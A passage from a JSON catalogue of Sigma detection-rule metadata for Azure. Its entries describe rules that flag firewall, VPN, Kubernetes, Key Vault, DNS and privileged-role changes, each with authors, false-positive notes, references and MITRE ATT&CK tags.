If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_firewall_rule_collection_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", "value": "Azure Firewall Rule Collection Modified or Deleted" }, { "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_p2s_vpn_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", "value": "Azure Point-to-site VPN Modified or Deleted" }, { "description": "Identifies when an Azure Kubernetes network policy is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "Network Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Network Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_kubernetes_network_policy_change.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_network_policy_change.yml" ], "tags": [ "attack.impact", "attack.credential-access" ] }, "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", "value": "Azure Kubernetes Network Policy Change" }, { "description": "Identifies when an application security group is modified or deleted.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-16", "falsepositive": [ "Application security group being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_application_security_group_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_security_group_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", "value": "Azure Application Security Group Modified or Deleted" }, { "description": "Identifies when a suppression rule is created in Azure. Adversaries could attempt this to evade detection.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-16", "falsepositive": [ "Suppression Rule being created may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_suppression_rule_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_suppression_rule_created.yml" ], "tags": [ "attack.impact" ] }, "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", "value": "Azure Suppression Rule Created" }, { "description": "Identifies when a new cloudshell is created inside the Azure portal.", "meta": { "author": "Austin Songer", "creation_date": "2021-09-21", "falsepositive": [ "A new cloudshell may be created by a system administrator." 
], "filename": "azure_new_cloudshell_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_new_cloudshell_created.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", "value": "Azure New CloudShell Created" }, { "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_rolebinding_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.credential-access" ] }, "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted" }, { "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-16", "falsepositive": [ "Key being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_keyvault_key_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_key_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.credential-access", "attack.t1552", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "80eeab92-0979-4152-942d-96749e11df40", "value": "Azure Keyvault Key Modified or Deleted" }, { "description": "Identifies when a key vault is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-16", "falsepositive": [ "Key Vault being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_keyvault_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.credential-access", "attack.t1552", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", "value": "Azure Key Vault Modified or Deleted" }, { "description": "Identifies when a Firewall Policy is Modified or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-02", "falsepositive": [ "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_network_firewall_policy_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_firewall_policy_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1562.007" ] }, "related": [ { "dest-uuid": "77532a55-c283-4cd2-bc5d-2d0b65e9d88c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", "value": "Azure Network Firewall Policy Modified or Deleted" }, { "description": "Identifies when a service account is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_service_account_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", "value": "Azure Kubernetes Service Account Modified or Deleted" }, { "description": "Detects when an Azure Kubernetes Cluster is created or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_kubernetes_cluster_created_or_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_cluster_created_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", "value": "Azure Kubernetes Cluster Created or Deleted" }, { "description": "Identifies when an application gateway is modified or deleted.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-16", "falsepositive": [ "Application gateway being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_application_gateway_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_gateway_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", "value": "Azure Application Gateway Modified or Deleted" }, { "description": "Identifies when DNS zone is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_dns_zone_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_dns_zone_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af6925b0-8826-47f1-9324-337507a0babd", "value": "Azure DNS Zone Modified or Deleted" }, { "description": "Identifies when an application credential is modified.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-02", "falsepositive": [ "An application credential being added may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Application credentials added by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_app_credential_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_app_credential_modification.yml" ], "tags": [ "attack.impact" ] }, "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", "value": "Azure Application Credential Modified" }, { "description": "Identifies the number of VM creation or deployment activities that occur in Azure via the azureactivity log.", "meta": { "author": "sawwinnnaung", "creation_date": "2020-05-07", "falsepositive": [ "Valid change" ], "filename": "azure_creating_number_of_resources_detection.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_creating_number_of_resources_detection.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", "value": "Number Of Resource Creation Or Deployment Activities" }, { "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is no longer needed via HTTP requests to Azure.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", 
"creation_date": "2021-08-26", "falsepositive": [ "Legitimate AAD Health AD FS service instances being deleted in a tenant" ], "filename": "azure_aadhybridhealth_adfs_service_delete.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://o365blog.com/post/hybridhealthagent/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_service_delete.yml" ], "tags": [ "attack.defense-evasion", "attack.t1578.003" ] }, "related": [ { "dest-uuid": "70857657-bd0b-4695-ad3e-b13f92cac1b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", "value": "Azure Active Directory Hybrid Health AD FS Service Delete" }, { "description": "Identifies when a firewall is created, modified, or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_firewall_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_firewall_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", "value": "Azure Firewall Modified or Deleted" }, { "description": "Identifies when a device in azure is no longer managed or compliant", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-03", "falsepositive": [ "Administrator may have forgotten to review the device." ], "filename": "azure_device_no_longer_managed_or_compliant.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_device_no_longer_managed_or_compliant.yml" ], "tags": [ "attack.impact" ] }, "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", "value": "Azure Device No Longer Managed or Compliant" }, { "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Virtual Network Device being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_network_virtual_device_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_virtual_device_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", "value": "Azure Virtual Network Device Modified or Deleted" }, { "description": "Identifies when a network security configuration is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_network_security_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_security_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", "value": "Azure Network Security Configuration Modified or Deleted" }, { "description": "Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-22", "falsepositive": [ "Azure Kubernetes CronJob/Job may be done by a system administrator.", "If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_kubernetes_cronjob.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml" ], "tags": [ "attack.persistence", "attack.t1053.003", "attack.privilege-escalation", "attack.execution" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", "value": "Azure Kubernetes CronJob" }, { "description": "Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_kubernetes_events_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_events_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", "value": "Azure Kubernetes Events Deleted" }, { "description": "Identifies when an account hasn't signed in during the past n number of days.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate if potential generic account that cannot be removed." 
], "filename": "azure_pim_account_stale.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e402c26a-267a-45bd-9615-bd9ceda6da85", "value": "Stale Accounts In A Privileged Role" }, { "description": "Identifies when an organization doesn't have the proper license for PIM and is out of compliance.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate if licenses have expired." 
], "filename": "azure_pim_invalid_license.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58af08eb-f9e1-43c8-9805-3ad9b0482bd8", "value": "Invalid PIM License" }, { "description": "Identifies when a privilege role can be activated without performing mfa.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate if user is performing MFA at sign-in." 
], "filename": "azure_pim_role_no_mfa_required.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "94a66f46-5b64-46ce-80b2-75dcbe627cc0", "value": "Roles Activation Doesn't Require MFA" }, { "description": "Identifies when a user has been assigned a privileged role and is not using that role.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate if potential generic account that cannot be removed." 
], "filename": "azure_pim_role_not_used.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c6ec464-4ae4-43ac-936a-291da66ed13d", "value": "Roles Are Not Being Used" }, { "description": "Identifies an event where there are too many accounts assigned the Global Administrator role.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate if threshold setting in PIM is too low." 
], "filename": "azure_pim_too_many_global_admins.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7bbc309f-e2b1-4eb1-8369-131a367d67d3", "value": "Too Many Global Admins" }, { "description": "Identifies when the same privilege role has multiple activations by the same user.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate where if active time period for a role is set too short." 
], "filename": "azure_pim_role_frequent_activation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "645fd80d-6c07-435b-9e06-7bc1b5656cba", "value": "Roles Activated Too Frequently" }, { "description": "Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there." 
